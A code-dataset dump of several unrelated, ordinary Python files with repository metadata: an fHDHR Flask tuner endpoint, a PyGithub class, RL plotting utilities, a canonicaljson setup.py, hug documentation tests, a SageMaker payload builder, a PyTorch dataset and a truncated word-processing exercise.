| 43.326531 | 136 | 0.576857 | from flask import Response, request, redirect, abort, stream_with_context, session
import urllib.parse
import uuid
import json
from fHDHR.exceptions import TunerError
class Tuners():
endpoints = ["/api/tuners"]
endpoint_name = "api_tuners"
endpoint_methods = ["GET", "POST"]
def __init__(self, fhdhr):
self.fhdhr = fhdhr
def __call__(self, *args):
return self.get(*args)
def get(self, *args):
client_address = request.remote_addr
accessed_url = request.args.get('accessed', default=request.url, type=str)
method = request.args.get('method', default=self.fhdhr.config.dict["fhdhr"]["stream_type"], type=str)
tuner_number = request.args.get('tuner', None, type=str)
redirect_url = request.args.get('redirect', default=None, type=str)
if method in ["direct", "ffmpeg", "vlc"]:
channel_number = request.args.get('channel', None, type=str)
if not channel_number:
return "Missing Channel"
if str(channel_number) not in [str(x) for x in self.fhdhr.device.channels.get_channel_list("number")]:
response = Response("Not Found", status=404)
response.headers["X-fHDHR-Error"] = "801 - Unknown Channel"
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
channel_dict = self.fhdhr.device.channels.get_channel_dict("number", channel_number)
if not channel_dict["enabled"]:
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = str("806 - Tune Failed")
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
duration = request.args.get('duration', default=0, type=int)
transcode = request.args.get('transcode', default=None, type=str)
valid_transcode_types = [None, "heavy", "mobile", "internet720", "internet480", "internet360", "internet240"]
if transcode not in valid_transcode_types:
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = "802 - Unknown Transcode Profile"
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
stream_args = {
"channel": channel_number,
"method": method,
"duration": duration,
"transcode": transcode,
"accessed": accessed_url,
"client": client_address,
"client_id": str(client_address) + "_" + str(uuid.uuid4())
}
try:
if not tuner_number:
tunernum = self.fhdhr.device.tuners.first_available(channel_number)
else:
tunernum = self.fhdhr.device.tuners.tuner_grab(tuner_number, channel_number)
except TunerError as e:
self.fhdhr.logger.info("A %s stream request for channel %s was rejected due to %s"
% (stream_args["method"], str(stream_args["channel"]), str(e)))
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = str(e)
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
tuner = self.fhdhr.device.tuners.tuners[str(tunernum)]
try:
stream_args = self.fhdhr.device.tuners.get_stream_info(stream_args)
except TunerError as e:
self.fhdhr.logger.info("A %s stream request for channel %s was rejected due to %s"
% (stream_args["method"], str(stream_args["channel"]), str(e)))
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = str(e)
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
tuner.close()
abort(response)
self.fhdhr.logger.info("Tuner #" + str(tunernum) + " to be used for stream.")
tuner.set_status(stream_args)
session["tuner_used"] = tunernum
if stream_args["method"] == "direct":
return Response(tuner.get_stream(stream_args, tuner), content_type=stream_args["content_type"], direct_passthrough=True)
elif stream_args["method"] in ["ffmpeg", "vlc"]:
return Response(stream_with_context(tuner.get_stream(stream_args, tuner)), mimetype=stream_args["content_type"])
elif method == "close":
if not tuner_number or str(tuner_number) not in list(self.fhdhr.device.tuners.tuners.keys()):
return "%s Invalid tuner" % str(tuner_number)
session["tuner_used"] = tuner_number
tuner = self.fhdhr.device.tuners.tuners[str(tuner_number)]
tuner.close()
elif method == "scan":
if not tuner_number:
tunernum = self.fhdhr.device.tuners.first_available(None)
else:
tunernum = self.fhdhr.device.tuners.tuner_grab(tuner_number, None)
tuner = self.fhdhr.device.tuners.tuners[str(tunernum)]
tuner.channel_scan(grabbed=True)
elif method == "status":
if not tuner_number:
tuner_status = self.fhdhr.device.tuners.status()
elif str(tuner_number) in list(self.fhdhr.device.tuners.tuners.keys()):
tuner_status = self.fhdhr.device.tuners.tuners[str(tuner_number)].get_status()
else:
tuner_status = ["Invalid Tuner %s" % tuner_number]
tuner_status_json = json.dumps(tuner_status, indent=4)
return Response(status=200,
response=tuner_status_json,
mimetype='application/json')
else:
return "%s Invalid Method" % method
if redirect_url:
return redirect(redirect_url + "?retmessage=" + urllib.parse.quote("%s Success" % method))
else:
return "%s Success" % method
| true | true |
1c2cc77d829397c44bab480b94841a27a072d9a0 | 2,969 | py | Python | env/Lib/site-packages/github/InputFileContent.py | nitish21/fork-repo-app | 78992f061c0e5e46f95858df0fbf8478d1a5c716 | [
"MIT"
] | 1 | 2020-08-13T12:21:56.000Z | 2020-08-13T12:21:56.000Z | env/Lib/site-packages/github/InputFileContent.py | nitish21/fork-repo-app | 78992f061c0e5e46f95858df0fbf8478d1a5c716 | [
"MIT"
] | 6 | 2020-12-17T09:37:03.000Z | 2020-12-18T04:42:23.000Z | venv/lib/python3.7/site-packages/github/InputFileContent.py | bhaving07/pyup | 17ad21a2957c5cce91ad0cf5f75853a3182806d2 | [
"MIT"
] | 1 | 2020-08-13T12:21:58.000Z | 2020-08-13T12:21:58.000Z | # -*- coding: utf-8 -*-
############################ Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2014 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2016 Peter Buckley <dx-pbuckley@users.noreply.github.com> #
# Copyright 2018 Wan Liuyang <tsfdye@gmail.com> #
# Copyright 2018 sfdye <tsfdye@gmail.com> #
# #
# This file is part of PyGithub. #
# http://pygithub.readthedocs.io/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
################################################################################
import github.GithubObject
class InputFileContent(object):
"""
This class represents InputFileContents
"""
def __init__(self, content, new_name=github.GithubObject.NotSet):
"""
:param content: string
:param new_name: string
"""
assert isinstance(content, str), content
assert new_name is github.GithubObject.NotSet or isinstance(
new_name, str
), new_name
self.__newName = new_name
self.__content = content
@property
def _identity(self):
identity = {
"content": self.__content,
}
if self.__newName is not github.GithubObject.NotSet:
identity["filename"] = self.__newName
return identity
| 49.483333 | 80 | 0.453351 | true | true | |
1c2cc85e2a3657c90e7a5b9afc08c030f80a0c7c | 3,447 | py | Python | plots/plot_utils_mb.py | jackwilkinson255/mbmpo_master | e9e0eaf542c7895764dcb0bfee28752818124ff2 | [
"MIT"
] | 28 | 2018-11-15T14:14:23.000Z | 2022-01-10T01:53:43.000Z | plots/plot_utils_mb.py | hongzimao/model_ensemble_meta_learning | 8b1351df94dfe530efaff1118022315c8d877774 | [
"MIT"
] | 3 | 2019-05-05T23:39:01.000Z | 2021-06-15T15:28:06.000Z | plots/plot_utils_mb.py | hongzimao/model_ensemble_meta_learning | 8b1351df94dfe530efaff1118022315c8d877774 | [
"MIT"
] | 14 | 2018-11-15T16:47:02.000Z | 2021-05-28T14:58:01.000Z | import numpy as np
from rllab.misc.ext import flatten
from pprint import pprint
from collections import OrderedDict, defaultdict
def filter(exps_data, filters={}):
print("before filtering", len(exps_data), 'exps')
keep_array = []
if filters:
for i, exp in enumerate(exps_data):
keep_array.append(all([((filter_key not in exp['flat_params']) or ((filter_key in exp['flat_params']) and (exp['flat_params'][filter_key] == filter_val)))
for filter_key, filter_val in filters.items()]))
exps_data_filtered = np.array(exps_data)
exps_data_filtered = exps_data_filtered[keep_array]
else:
exps_data_filtered = exps_data
print("after filtering", len(exps_data_filtered), 'exps')
return exps_data_filtered
def group_by(exp_data, group_by_key=None):
split_dict = OrderedDict()
for exp in exp_data:
if group_by_key == 'exp_name':
exp['flat_params']['exp_name'] = exp['flat_params']['exp_name'].replace('-', '_')
key_str = str(exp['flat_params'][group_by_key]).split('_')[2]
if key_str == 'maml':
key_str = 'ours'
elif key_str == 'mpc':
key_str = 'mb-mpc'
elif key_str == 'train':
key_str = 'me-trpo'
elif group_by_key == 'env.$class':
key_str = str(exp['flat_params'][group_by_key]).split('.')[-1]
if key_str[-13:] == 'EnvRandParams':
key_str = key_str[:-13]
elif key_str[-15:] == 'EnvRandomParams':
key_str = key_str[:-15] + '2D'
else:
key_str = key_str[:-3]
else:
key_str = str(exp['flat_params'][group_by_key])
if key_str in split_dict.keys():
split_dict[key_str].append(exp)
else:
split_dict[key_str] = [exp]
return split_dict
def prepare_data_for_plot(exp_data, x_key='n_timesteps', y_key=None, sup_y_key=None, round_x=None):
x_y_tuples = []
for exp in exp_data:
name = exp['flat_params']['exp_name'].replace('-', '_')
key_str = str(name).split('_')[2]
if key_str == 'maml':
off_set = (exp['progress'][x_key][1] - exp['progress'][x_key][0])/2
else:
off_set = 0
if sup_y_key is not None:
assert type(sup_y_key) is list
for key in sup_y_key:
if key in exp['progress'].keys():
x_y_tuples.extend(list(zip(exp['progress'][x_key]-off_set, exp['progress'][key])))
break
else:
x_y_tuples.extend(list(zip(exp['progress'][x_key], exp['progress'][y_key])))
x_y_dict = defaultdict(list)
for k, v in x_y_tuples:
if round_x is not None:
x_y_dict[(k//round_x) * round_x].append(v)
else:
x_y_dict[k].append(v)
means, stddevs = [], []
for key in sorted(x_y_dict.keys()):
means.append(np.mean(x_y_dict[key]))
stddevs.append(np.std(x_y_dict[key]))
return np.array(sorted(x_y_dict.keys())), np.array(means), np.array(stddevs)
def correct_limit(ax, x, y):
# ax: axes object handle
# x: data for entire x-axes
# y: data for entire y-axes
# assumption: you have already set the x-limit as desired
lims = ax.get_xlim()
i = np.where((x > lims[0]) & (x < lims[1]))[0]
return y[i].min(), y[i].max()
| 40.552941 | 166 | 0.575573 | import numpy as np
from rllab.misc.ext import flatten
from pprint import pprint
from collections import OrderedDict, defaultdict
def filter(exps_data, filters={}):
print("before filtering", len(exps_data), 'exps')
keep_array = []
if filters:
for i, exp in enumerate(exps_data):
keep_array.append(all([((filter_key not in exp['flat_params']) or ((filter_key in exp['flat_params']) and (exp['flat_params'][filter_key] == filter_val)))
for filter_key, filter_val in filters.items()]))
exps_data_filtered = np.array(exps_data)
exps_data_filtered = exps_data_filtered[keep_array]
else:
exps_data_filtered = exps_data
print("after filtering", len(exps_data_filtered), 'exps')
return exps_data_filtered
def group_by(exp_data, group_by_key=None):
split_dict = OrderedDict()
for exp in exp_data:
if group_by_key == 'exp_name':
exp['flat_params']['exp_name'] = exp['flat_params']['exp_name'].replace('-', '_')
key_str = str(exp['flat_params'][group_by_key]).split('_')[2]
if key_str == 'maml':
key_str = 'ours'
elif key_str == 'mpc':
key_str = 'mb-mpc'
elif key_str == 'train':
key_str = 'me-trpo'
elif group_by_key == 'env.$class':
key_str = str(exp['flat_params'][group_by_key]).split('.')[-1]
if key_str[-13:] == 'EnvRandParams':
key_str = key_str[:-13]
elif key_str[-15:] == 'EnvRandomParams':
key_str = key_str[:-15] + '2D'
else:
key_str = key_str[:-3]
else:
key_str = str(exp['flat_params'][group_by_key])
if key_str in split_dict.keys():
split_dict[key_str].append(exp)
else:
split_dict[key_str] = [exp]
return split_dict
def prepare_data_for_plot(exp_data, x_key='n_timesteps', y_key=None, sup_y_key=None, round_x=None):
x_y_tuples = []
for exp in exp_data:
name = exp['flat_params']['exp_name'].replace('-', '_')
key_str = str(name).split('_')[2]
if key_str == 'maml':
off_set = (exp['progress'][x_key][1] - exp['progress'][x_key][0])/2
else:
off_set = 0
if sup_y_key is not None:
assert type(sup_y_key) is list
for key in sup_y_key:
if key in exp['progress'].keys():
x_y_tuples.extend(list(zip(exp['progress'][x_key]-off_set, exp['progress'][key])))
break
else:
x_y_tuples.extend(list(zip(exp['progress'][x_key], exp['progress'][y_key])))
x_y_dict = defaultdict(list)
for k, v in x_y_tuples:
if round_x is not None:
x_y_dict[(k//round_x) * round_x].append(v)
else:
x_y_dict[k].append(v)
means, stddevs = [], []
for key in sorted(x_y_dict.keys()):
means.append(np.mean(x_y_dict[key]))
stddevs.append(np.std(x_y_dict[key]))
return np.array(sorted(x_y_dict.keys())), np.array(means), np.array(stddevs)
def correct_limit(ax, x, y):
lims = ax.get_xlim()
i = np.where((x > lims[0]) & (x < lims[1]))[0]
return y[i].min(), y[i].max()
| true | true |
1c2cc94600336b641b10100f3b693833a810a703 | 2,298 | py | Python | setup.py | H-Shay/python-canonicaljson | b28486228619e10530edead41ba59be50bd7aad1 | [
"Apache-2.0"
] | 27 | 2015-11-28T21:24:45.000Z | 2022-03-04T17:13:04.000Z | setup.py | H-Shay/python-canonicaljson | b28486228619e10530edead41ba59be50bd7aad1 | [
"Apache-2.0"
] | 36 | 2016-08-23T19:17:00.000Z | 2022-03-04T15:48:37.000Z | setup.py | H-Shay/python-canonicaljson | b28486228619e10530edead41ba59be50bd7aad1 | [
"Apache-2.0"
] | 12 | 2016-04-07T10:06:23.000Z | 2022-02-28T12:30:35.000Z | #!/usr/bin/env python
# Copyright 2015 OpenMarket Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
from codecs import open
import os
here = os.path.abspath(os.path.dirname(__file__))
def read_file(path_segments):
"""Read a UTF-8 file from the package. Takes a list of strings to join to
make the path"""
file_path = os.path.join(here, *path_segments)
with open(file_path, encoding="utf-8") as f:
return f.read()
def exec_file(path_segments, name):
"""Extract a constant from a python file by looking for a line defining
the constant and executing it."""
result = {}
code = read_file(path_segments)
lines = [line for line in code.split("\n") if line.startswith(name)]
exec("\n".join(lines), result)
return result[name]
setup(
name="canonicaljson",
version=exec_file(("canonicaljson.py",), "__version__"),
py_modules=["canonicaljson"],
description="Canonical JSON",
install_requires=[
# simplerjson versions before 3.14.0 had a bug with some characters
# (e.g. \u2028) if ensure_ascii was set to false.
"simplejson>=3.14.0",
"frozendict>=1.0",
],
zip_safe=True,
long_description=read_file(("README.rst",)),
keywords="json",
author="The Matrix.org Team",
author_email="team@matrix.org",
url="https://github.com/matrix-org/python-canonicaljson",
license="Apache License, Version 2.0",
python_requires="~=3.5",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
],
)
| 32.828571 | 77 | 0.681897 |
from setuptools import setup
from codecs import open
import os
here = os.path.abspath(os.path.dirname(__file__))
def read_file(path_segments):
file_path = os.path.join(here, *path_segments)
with open(file_path, encoding="utf-8") as f:
return f.read()
def exec_file(path_segments, name):
result = {}
code = read_file(path_segments)
lines = [line for line in code.split("\n") if line.startswith(name)]
exec("\n".join(lines), result)
return result[name]
setup(
name="canonicaljson",
version=exec_file(("canonicaljson.py",), "__version__"),
py_modules=["canonicaljson"],
description="Canonical JSON",
install_requires=[
"simplejson>=3.14.0",
"frozendict>=1.0",
],
zip_safe=True,
long_description=read_file(("README.rst",)),
keywords="json",
author="The Matrix.org Team",
author_email="team@matrix.org",
url="https://github.com/matrix-org/python-canonicaljson",
license="Apache License, Version 2.0",
python_requires="~=3.5",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
],
)
| true | true |
1c2cca35a74332f377244398859324b2bdc9ec2d | 3,732 | py | Python | tests/test_documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | tests/test_documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | tests/test_documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | """tests/test_documentation.py.
Tests the documentation generation capibilities integrated into Hug
Copyright (C) 2015 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
import sys
import json
import hug
from falcon import Request
from falcon.testing import StartResponseMock, create_environ
api = sys.modules[__name__]
def test_basic_documentation():
'''Ensure creating and then documenting APIs with Hug works as intuitively as expected'''
@hug.get()
def hello_world():
"""Returns hello world"""
return "Hello World!"
@hug.post()
def echo(text):
"""Returns back whatever data it is given in the text parameter"""
return text
@hug.post('/happy_birthday', examples="name=HUG&age=1")
def birthday(name, age:hug.types.number=1):
"""Says happy birthday to a user"""
return "Happy {age} Birthday {name}!".format(**locals())
@hug.post()
def noop(request, response):
"""Performs no action"""
pass
documentation = hug.documentation.generate(api)
assert 'test_documentation' in documentation['overview']
assert '/hello_world' in documentation
assert '/echo' in documentation
assert '/happy_birthday' in documentation
assert not '/birthday' in documentation
assert '/noop' in documentation
assert documentation['/hello_world']['GET']['usage'] == "Returns hello world"
assert documentation['/hello_world']['GET']['examples'] == ["/hello_world"]
assert documentation['/hello_world']['GET']['outputs']['content_type'] == "application/json"
assert not 'inputs' in documentation['/hello_world']['GET']
assert 'text' in documentation['/echo']['POST']['inputs']['text']['type']
assert not 'default' in documentation['/echo']['POST']['inputs']['text']
assert 'number' in documentation['/happy_birthday']['POST']['inputs']['age']['type']
assert documentation['/happy_birthday']['POST']['inputs']['age']['default'] == 1
assert not 'inputs' in documentation['/noop']['POST']
@hug.post(versions=1)
def echo(text):
"""V1 Docs"""
return 'V1'
versioned_doc = hug.documentation.generate(api)
assert 'versions' in versioned_doc
assert 1 in versioned_doc['versions']
specific_version_doc = hug.documentation.generate(api, api_version=1)
assert not 'versions' in specific_version_doc
assert '/echo' in specific_version_doc
handler = hug.run.documentation_404(api)
response = StartResponseMock()
handler(Request(create_environ(path='v1/doc')), response)
documentation = json.loads(response.data.decode('utf8'))['documentation']
assert not 'versions' in documentation
assert '/echo' in documentation
| 38.474227 | 112 | 0.715702 | import sys
import json
import hug
from falcon import Request
from falcon.testing import StartResponseMock, create_environ
api = sys.modules[__name__]
def test_basic_documentation():
@hug.get()
def hello_world():
return "Hello World!"
@hug.post()
def echo(text):
return text
@hug.post('/happy_birthday', examples="name=HUG&age=1")
def birthday(name, age:hug.types.number=1):
return "Happy {age} Birthday {name}!".format(**locals())
@hug.post()
def noop(request, response):
pass
documentation = hug.documentation.generate(api)
assert 'test_documentation' in documentation['overview']
assert '/hello_world' in documentation
assert '/echo' in documentation
assert '/happy_birthday' in documentation
assert not '/birthday' in documentation
assert '/noop' in documentation
assert documentation['/hello_world']['GET']['usage'] == "Returns hello world"
assert documentation['/hello_world']['GET']['examples'] == ["/hello_world"]
assert documentation['/hello_world']['GET']['outputs']['content_type'] == "application/json"
assert not 'inputs' in documentation['/hello_world']['GET']
assert 'text' in documentation['/echo']['POST']['inputs']['text']['type']
assert not 'default' in documentation['/echo']['POST']['inputs']['text']
assert 'number' in documentation['/happy_birthday']['POST']['inputs']['age']['type']
assert documentation['/happy_birthday']['POST']['inputs']['age']['default'] == 1
assert not 'inputs' in documentation['/noop']['POST']
@hug.post(versions=1)
def echo(text):
return 'V1'
versioned_doc = hug.documentation.generate(api)
assert 'versions' in versioned_doc
assert 1 in versioned_doc['versions']
specific_version_doc = hug.documentation.generate(api, api_version=1)
assert not 'versions' in specific_version_doc
assert '/echo' in specific_version_doc
handler = hug.run.documentation_404(api)
response = StartResponseMock()
handler(Request(create_environ(path='v1/doc')), response)
documentation = json.loads(response.data.decode('utf8'))['documentation']
assert not 'versions' in documentation
assert '/echo' in documentation
| true | true |
1c2cca974cf1dcfdfefeff96f2e21d26308fae81 | 421 | py | Python | mme/construct_payload.py | arunprsh/SageMaker-Load-Testing | 94c09520f9e8d63a936749af474efbc5de18c719 | [
"Apache-2.0"
] | 12 | 2021-01-20T04:35:06.000Z | 2022-03-02T14:48:45.000Z | mme/construct_payload.py | C24IO/SageMaker-Load-Testing | f1efbe63f7e7bdfa8c0ea2c13ff544f94231fe8e | [
"Apache-2.0"
] | null | null | null | mme/construct_payload.py | C24IO/SageMaker-Load-Testing | f1efbe63f7e7bdfa8c0ea2c13ff544f94231fe8e | [
"Apache-2.0"
] | 3 | 2021-04-14T18:29:33.000Z | 2021-12-08T18:58:12.000Z | headers = 'id,text,filename__v,format__v,size__v,charsize,pages__v'
id_ = '31011'
text = """Investigational Product Accountability Log
"""
filename__v = 'foo.docx'
format__v = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
size__v = '16290'
charsize = '768'
pages__v = '1'
row = ','.join([id_, repr(text), filename__v, format__v, size__v, charsize, pages__v])
PAYLOAD = headers + '\n' + row | 28.066667 | 86 | 0.738717 | headers = 'id,text,filename__v,format__v,size__v,charsize,pages__v'
id_ = '31011'
text = """Investigational Product Accountability Log
"""
filename__v = 'foo.docx'
format__v = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
size__v = '16290'
charsize = '768'
pages__v = '1'
row = ','.join([id_, repr(text), filename__v, format__v, size__v, charsize, pages__v])
PAYLOAD = headers + '\n' + row | true | true |
1c2ccb41874d89447182b59e9eb3225355995335 | 756 | py | Python | webinspect/__init__.py | hqlian007/AndroidUISpy | 58bef1c590182baea0de91b2eecc68c3255a6f72 | [
"BSD-3-Clause"
] | null | null | null | webinspect/__init__.py | hqlian007/AndroidUISpy | 58bef1c590182baea0de91b2eecc68c3255a6f72 | [
"BSD-3-Clause"
] | null | null | null | webinspect/__init__.py | hqlian007/AndroidUISpy | 58bef1c590182baea0de91b2eecc68c3255a6f72 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''用于探测WEB元素
''' | 44.470588 | 89 | 0.739418 | true | true | |
1c2ccd2404baa48459d5538ea58cdda8b1dfb0bc | 1,318 | py | Python | src/xrl/algorithms/minidr/dataset.py | k4ntz/XmodRL | dffb416bcd91010d8075ee1ac00cc4b9a3021967 | [
"MIT"
] | null | null | null | src/xrl/algorithms/minidr/dataset.py | k4ntz/XmodRL | dffb416bcd91010d8075ee1ac00cc4b9a3021967 | [
"MIT"
] | null | null | null | src/xrl/algorithms/minidr/dataset.py | k4ntz/XmodRL | dffb416bcd91010d8075ee1ac00cc4b9a3021967 | [
"MIT"
] | 1 | 2021-11-10T18:09:27.000Z | 2021-11-10T18:09:27.000Z | import numpy as np
import torch
from torch._C import dtype
import torch.nn as nn
from torch.utils.data import Dataset
class ModelDataset(Dataset):
def __init__(self, history, history_size):
self.h = history #history is passed as list and updated outside
self.history_size = history_size
def __len__(self):
return self.history_size
def __getitem__(self, idx):
idx = idx % len(self.h) #do not exceed history length
episode = self.h[idx]
idx_sample = np.random.randint(0, (len(episode)-1)//4) #sample random part of episode
# one entry is last state, action, state and reward as seperate entries
last_states = episode[idx_sample * 4]
actions= episode[idx_sample * 4 + 1]
states = episode[idx_sample * 4 + 2]
rewards= episode[idx_sample * 4 + 3]
# flatten raw features list
last_states = [[0,0] if x==None else x for x in last_states]
last_states = np.array(np.array(last_states).tolist()).flatten()
# convert to tensor
last_states = torch.tensor(last_states).float()
actions = torch.tensor(actions)
states = torch.tensor(np.array(states.tolist()).flatten()).float()
rewards = torch.tensor(rewards)
return last_states, actions, states, rewards | 36.611111 | 93 | 0.658574 | import numpy as np
import torch
from torch._C import dtype
import torch.nn as nn
from torch.utils.data import Dataset
class ModelDataset(Dataset):
def __init__(self, history, history_size):
self.h = history
self.history_size = history_size
def __len__(self):
return self.history_size
def __getitem__(self, idx):
idx = idx % len(self.h)
episode = self.h[idx]
idx_sample = np.random.randint(0, (len(episode)-1)//4)
last_states = episode[idx_sample * 4]
actions= episode[idx_sample * 4 + 1]
states = episode[idx_sample * 4 + 2]
rewards= episode[idx_sample * 4 + 3]
last_states = [[0,0] if x==None else x for x in last_states]
last_states = np.array(np.array(last_states).tolist()).flatten()
last_states = torch.tensor(last_states).float()
actions = torch.tensor(actions)
states = torch.tensor(np.array(states.tolist()).flatten()).float()
rewards = torch.tensor(rewards)
return last_states, actions, states, rewards | true | true |
1c2cceb046fb9903d31b37fb08da5b9ddd5d1010 | 1,706 | py | Python | profiles_api/migrations/0001_initial.py | Anuj2608/profiles-rest-api | 6a717c578918f6d7d39907b331d3517ace5a5fe5 | [
"MIT"
] | null | null | null | profiles_api/migrations/0001_initial.py | Anuj2608/profiles-rest-api | 6a717c578918f6d7d39907b331d3517ace5a5fe5 | [
"MIT"
] | 5 | 2020-06-06T01:54:14.000Z | 2021-06-10T20:11:58.000Z | profiles_api/migrations/0001_initial.py | MyNewLearnings2021/profiles-rest-api | 6a717c578918f6d7d39907b331d3517ace5a5fe5 | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2020-05-14 16:53
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| 50.176471 | 266 | 0.638921 |
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| true | true |
1c2ccf214446d9691fe6e4f4dab136343f93bacc | 1,377 | py | Python | src/Fourteenth Chapter/Example4.py | matthijskrul/ThinkPython | 34c1d81f4ef535c32b8b0309b23c7ca37f851606 | [
"MIT"
] | null | null | null | src/Fourteenth Chapter/Example4.py | matthijskrul/ThinkPython | 34c1d81f4ef535c32b8b0309b23c7ca37f851606 | [
"MIT"
] | null | null | null | src/Fourteenth Chapter/Example4.py | matthijskrul/ThinkPython | 34c1d81f4ef535c32b8b0309b23c7ca37f851606 | [
"MIT"
] | null | null | null | def text_to_words(the_text):
""" return a list of words with all punctuation removed,
and all in lowercase.
"""
my_substitutions = the_text.maketrans(
# If you find any of these
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&()*+,-./:;<=>?@[]^_`{|}~'\\",
# Replace them by these
"abcdefghijklmnopqrstuvwxyz ")
# Translate the text now.
cleaned_text = the_text.translate(my_substitutions)
wds = cleaned_text.split()
return wds
def get_words_in_book(filename):
""" Read a book from filename, and return a list of its words. """
f = open(filename, "r")
content = f.read()
f.close()
wds = text_to_words(content)
return wds
def remove_adjacent_dups(xs):
""" Return a new list in which all adjacent
duplicates from xs have been removed.
"""
result = []
